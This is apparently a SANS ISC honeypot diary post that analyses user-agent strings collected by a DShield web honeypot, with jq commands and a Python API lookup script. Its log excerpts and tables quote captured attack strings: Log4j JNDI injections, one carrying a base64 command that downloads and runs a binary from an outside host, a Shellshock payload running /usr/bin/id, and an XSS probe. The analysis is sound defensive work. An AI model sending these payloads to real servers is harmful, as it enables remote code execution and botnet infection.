What is that User Agent?
Devices are connecting to different web resources on a regular basis. One method to identify what is connecting to a web resource is through a user agent [1] and many are received on DShield [2] honeypots.
Figure 1: Popular user agents seen over the last 7 days from a honeypot
Some of these user agents are easier to understand than others. They can indicate the version of software used to connect to the web resource and, as seen in the example above, indicate access attempts from researchers.
Translating User Agent Strings
There are many resources to help and give human readible information on what these user agent strings indicate. Many allow for manual submission, but to save some time and effort, I wanted to automate this process. I decided to use an API through WhatIsMyBrowser [3] to gather data from user agents collected by one of my honeypots. First, I needed to gather the user agents that I have seen from my honeypot. and 'jq' was the tool I decided to use for a quick text export.
# read all web honeypot lots from my archival location
# default storage location for these logs is /srv/db/ on a DShield honeypot
# cat /logs/webhoneypot*.json
# select any user agent values where the value is not blank
# jq -r 'select(.useragent!="")'
# get raw user agent values (without quotes) and output to a text file
# jq -r .useragent[] > all_user_agents_historic.txt
cat /logs/webhoneypot*.json | jq -r 'select(.useragent!="")' | jq -r .useragent[] > all_user_agents_historic.txt
Now that I have all my user agents, I put together a short python script to process the data.
import requests
import json
from collections import Counter
def get_user_agents(file):
unique_user_agents = set()
all_headers = []
filehandle = open(file, "r")
for line in filehandle.readlines():
unique_user_agents.add(line.replace("\n", ""))
all_headers.append(line.replace("\n", ""))
return all_headers, unique_user_agents
def get_post_data(user_agent):
header = []
header.append({
"name": "USER_AGENT",
"value": user_agent,
})
return header
def request_user_agent_data(header):
headers = {
'X-API-KEY': "<redacted>",
}
post_data = {
"headers": header,
}
result = requests.post("https://api.whatismybrowser.com/api/v3/detect", data=json.dumps(post_data), headers=headers)
save_results(result.text, "results.json")
try:
save_results(
str(header_counts[header[0]["value"]]) + "|" +
result.json().get("detection").get("simple_software_string") + "|" +
header[0]["value"], "basic_results.csv"
)
except:
save_results(
str(header_counts[header[0]["value"]]) + "|" +
"No results found" + "|" +
header[0]["value"], "basic_results.csv"
)
def save_results(result, filename):
filehandle = open(filename, "a")
filehandle.write(result + "\n")
filehandle.close()
def process_headers(header_list):
for each_header in header_list:
request_user_agent_data(get_post_data(each_header))
all_headers, headers_to_send = get_user_agents("all_user_agents_historic.txt")
header_counts = Counter(all_headers)
process_headers(headers_to_send)
Some of this was based on example code documentation [4]. I ran into some issues submitting all of the headers in one request. Instead, this submits all of the unique user agents one at a time and saves the results to a couple files:
- basic_results.csv --> Bar ("|") delimited text file containing number of times the user agent was seen, translated user agent, raw user agent
- results.json --> raw results from every request
There are definitely some efficiencies to be made with the code, but it gave me what I was looking for.
User Agents Seen on a DShield Honeypot
Before going into some of the specific user agents, some information about the data used:
Time period of data | 8/3/2023 - 1/5/2024 (approximately 5 months of data) |
Number of user agent strings | 7,540,306 |
Number of unique user agent strings | 1,181 |
Figure 2: Summary of data used for analysis
Most Common User Agents
Count | Translated User Agent | Raw User Agent |
---|---|---|
2303996 | Firefox 22 on Windows 7 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 |
1702751 | Firefox 93 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 |
250183 | Chrome 81 on Linux | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
170996 | Chrome 117 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 |
157401 | Internet Explorer 7 on Windows Vista | Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727) |
138207 | Firefox 60 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 |
134014 | Go Http Client 1.1 | Go-http-client/1.1 |
121178 | Chrome 109 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 |
112378 | ZGrab 0.x | Mozilla/5.0 zgrab/0.x |
110627 | Chrome 116 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 |
Figure 3: Top 10 most common user agents seen on a DShield honeypot
The "translated user agent" is much easier to understand. The most popular user agent seen is for Windows 7 using Firefox 22. Windows 7 support ended in January of 2020 and Firefox 22 was released in 2013. This could either be a very old and outdated device, that also may be compromised, or it is a falsified user agent string. To better understand what hosts are using this specific user agent string, I can take a look at the raw data.
The data used for this search was only the last 7 days.
# read web honeypot json files
# cat /logs/webhoneypot*.json
# search for values that do not have a blank user agent
# jq -r 'select(.useragent!="")'
# search for our specific user agent string (Windows 7, Firefox 22)
# jq -r 'select(.useragent[]=="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0")'
# output the source IPs, sorted by the number of times the source IP was seen
# jq -r .sip | sort | uniq -c | sort -n
cat /logs/webhoneypot*.json | jq -r 'select(.useragent!="")' | jq -r 'select(.useragent[]=="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0")' | jq -r .sip | sort | uniq -c | sort -n
831351 80.243.171.172
This user agent has only been coming from 80.243.171.172 in the last week. Are there any other user agents that this particular IP is using?
cat /logs/webhoneypot*.json | jq -r 'select(.useragent!="")' | jq 'select(.sip=="80.243.171.172")' | jq -r .useragent[] | sort | uniq -c | sort -n
2 QualysGuard
116 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729);
185 ${jndi:nis://10.10.11.42:42643/QUALYSTEST}
207 ZX-80 SPECTRUM
263 ${jndi:corba://10.10.11.42:35625/QUALYSTEST}
439 ${jndi:http://10.10.11.42:43608/QUALYSTEST}
457 Java/1.8.0_102
496 Java/1.8.0_161
528 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
769 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
892 curl/7.55.1
964 ${jndi:ldap://10.10.11.42:37161/QUALYSTEST}
1017 ${jndi:ldaps://10.10.11.42:33141/QUALYSTEST}
1069 ${jndi:nds://10.10.11.42:43608/QUALYSTEST}
1105 ${jndi:ldaps://10.10.11.42:42091/QUALYSTEST}
1368 ${jndi:dns://10.10.11.42:42643/QUALYSTEST}
1500 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
1525 ${jndi:iiop://10.10.11.42:35625/QUALYSTEST}
1669 ${jndi:rmi://10.10.11.42:42091/QUALYSTEST}
1791 ${jndi:nis://10.10.11.42:45742/QUALYSTEST}
2653 ${jndi:rmi://10.10.11.42:33141/QUALYSTEST}
2794 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101
3062 ${jndi:dns://10.10.11.42:45742/QUALYSTEST}
3253 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.199 Safari/537.36
3305 Node.js
3642 Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
3805 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
3862 : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
3875 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
3889 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
4115 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
4374 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36
4467 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
4475 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
4596 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
4615 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
4625 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0
4868 Gecko/20100914
4894 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
5036 Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0
5222 () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id
5612 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
6442 curl/7.29.0
6652 gSOAP/2.8
6729 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
7534 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14)
7721 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
8052 Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
8073 Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
8230 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101
8644 curl/7.60.0
8649 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
8819 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
9145 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
9326 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0
9853 Mozilla/5.0
10708 <script>alert(Qualys)</script>
12703 curl/7.47.0
13541 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0
13746 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
15824 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
17642 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0
18622 Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
19283 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
19708 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729)
22817 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
32794 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
39371 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
40764 Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
74931 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
93445 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
831351 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0
864153 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Based on the data, it looks like this might be a Qualys scan [5]. Using different agent strings to access web resources can be particularly helpful to determine vulnerabilities and work around security controls. For example, some websites may block accss to their resources if using an automated tool like curl. However, this can be easily circumvented [6].
Least Common User Agents
Count | Translated User Agent | Raw User Agent |
1 | Chrome 92 on Android 11 | Mozilla/5.0 (Linux; Android 11; ONEPLUS A6000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36 |
1 | Chrome 56 on Windows 8 | Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3037.63 Safari/537.32 |
1 | Safari 10 on Mac OS X (Yosemite) | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/10.0 Safari/602.1.50 |
1 | Chromium 75 on Ubuntu Linux | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/75.0.3770.142 Chrome/75.0.3770.142 Safari/537.36 |
1 | Chrome 72 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 |
1 | No results found | t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//193.111.248[.]104:2213/TomcatBypass/Command/Base64 /d2dldCAtTyAvdG1wL3BhcmFpc28ueDg2IGh0dHA6Ly91cGRhdGUuZXRlcm5pdHlzdHJlc3Nlci54eXovZG93bmxvYWQvYmlu cy9wYXJhaXNvLng4NiA7IGN1cmwgLW8gL3RtcC9wYXJhaXNvLng4NiBodHRwOi8vdXBkYXRlLmV0ZXJuaXR5c3RyZXNzZXIue Hl6L2Rvd25sb2FkL2JpbnMvcGFyYWlzby54ODYgOyBjaG1vZCAreCAvdG1wL3BhcmFpc28ueDg2IDsgY2htb2QgNzc3IC90bX AvcGFyYWlzby54ODYgOyAvdG1wL3BhcmFpc28ueDg2IHg4NiA7IHJtIC1yZiAvdG1wL3BhcmFpc28ueDg2}') |
1 | Edge 118 on Android 11 | Mozilla/5.0 (Linux; Android 11; Pixel 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.4430.91 Mobile Safari/537.36 Edg/118.0.0.0 |
1 | Chrome 101 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 |
1 | Chrome 19 on iOS 5.1 | Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3 |
1 | Android Browser 3.1 on Android (Cupcake) | HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 |
Figure 4: Top 10 least common user agents seen on a DShield honeypot
These results indicate a user agent that was not found through the API. These items were listed as "No results found". This looks like a Log4j attack, attempting to download a payload from 193.111.248 on port port 2213. Any items that did not have a result could be a good place to look for customized user agents and attacks.
User Agents Not Found
Count | Translated User Agent | Raw User Agent |
---|---|---|
53175 | No results found | 'Cloud mapping experiment. Contact research@pdrlabs.net' |
38409 | No results found | Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com |
15048 | No results found | gSOAP/2.8 |
14492 | No results found | <script>alert(Qualys)</script> |
12540 | No results found | Hello World |
9009 | No results found | () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id |
6929 | No results found | Gecko/20100914 |
5170 | No results found | Node.js |
4612 | No results found | Sun Web Console Fingerprinter/7.15 |
3062 | No results found | ${jndi:dns://10.10.11.42:45742/QUALYSTEST} |
Figure 5: Top 10 most common user agents without a translated match, seen on a DShield honeypot
There are indications of research scans, vulneability scans, web attacks and perhaps some user agents that simply aren't defined yet in the resource that was used. Taking out any of the Log4j attacks and a couple derogatory items, these were the user agents without any results found:
- <script>alert(Qualys)</script>
- A
- Abcd
- abuse.xmco[.]fr
- Adobe Application Manager 2.0
- asusrouter--
- 'Cloud mapping experiment. Contact research@pdrlabs[.]net'
- Dark
- DoCoMo/2.0 SH901iC(c100;TB;W24H12)
- Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks[.]com
- fasthttp
- Gecko/20100914
- gSOAP/2.8
- hacked-by-matrix
- Hello World
- Hello World/1.0
- Hello, world
- Hello, World
- https://aff[.]rip/?affiliate_id=9345&keyword=tech+discord+server
- https://affgate[.]top/landing/aff/
- https://discordservers[.]su/
- Kryptos Logic Telltale - telltale.kryptoslogic[.]com
- l9tcpid/v1.1.0
- masscan/1.0 (https://github[.]com/robertdavidgraham/masscan)
- masscan/1.3 (https://github[.]com/robertdavidgraham/masscan)
- masscan-ng/1.3 (https://github[.]com/bi-zone/masscan-ng)
- Microsoft URL Control - 6.00.8862
- MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0
- Mozila/5.0
- nekololis-owned-you
- Node.js
- NukeBotC2
- Offline Explorer/2.5
- pOrT.sCaNnInG.iS.nOt.A.cRiMe
- QualysGuard
- r00ts3c-owned-you
- SEC-SGHX210/1.0 UP.Link/6.3.1.13.0
- Sun Web Console Fingerprinter/7.15
- t.me/DeltaApi
- the beast
- WDG_Validator/1.6.2
- WebCopier v4.6
- webprosbot/2.0 (+mailto:abuse-6337@webpros[.]com)
- WebZIP/3.5 (http://www.spidersoft[.]com)
- Xenu Link Sleuth/1.3.8
- xfa1
- ZX-80 SPECTRUM
Any of these user agents would be interesting to look into in more depth. Understanding the user agent strings accessing web resources can help to uncover suspicious activity. In addition, understanding the user agents coming from your network can also help uncover applications that reside on devices and the devices themselves.
Figure 6: User agents identifying a Roku TV
[1] https://en.wikipedia.org/wiki/User_agent
[2] https://isc.sans.edu/honeypot.html
[3] https://developers.whatismybrowser.com/api/
[4] https://developers.whatismybrowser.com/api/docs/v3/sample-code/python/detect/
[5] https://www.qualys.com/apps/web-app-scanning/
[6] https://phoenixnap.com/kb/curl-user-agent
--
Jesse La Grew
Handler
Comments